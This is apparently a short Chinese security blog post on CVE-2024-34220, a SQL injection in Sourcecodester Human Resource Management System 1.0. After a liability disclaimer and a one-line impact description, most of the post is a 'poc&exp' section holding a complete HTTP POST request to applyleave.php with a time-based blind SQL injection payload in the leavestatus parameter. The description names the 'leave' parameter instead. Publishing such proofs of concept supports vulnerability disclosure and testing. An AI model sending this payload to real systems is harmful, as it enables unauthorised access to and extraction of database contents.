CVE-2024-34220
CVE-2024-34220
A___bandon 漏洞猎人 2024-05-18 08:02
|
免责声明:本文所涉及的信息安全技术知识仅供参考和学习之用,并不构成任何明示或暗示的保证。读者在使用本文提供的信息时,应自行判断其适用性,并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下,本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规,并保证不违反任何相关法律法规。 |
影响描述
人力资源管理系统1.0易受通过“leave”参数进行SQL注入的攻击。Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the ‘leave’ parameter.
poc&exp
POST /hrm/user/applyleave.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/hrm/user/applyleave.php
Cookie: PHPSESSID=2v2v2al4dkd4iir9cl5j7oikvr
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: cyan
leavestatus=5'+AND+(SELECT+1337+FROM+(SELECT(SLEEP(5)))VSgR)+AND+'Kha'%3d'123&reason=+++&startdate=03%2F04%2F2024&enddate=29%2F04%2F2024&Apply=Submit
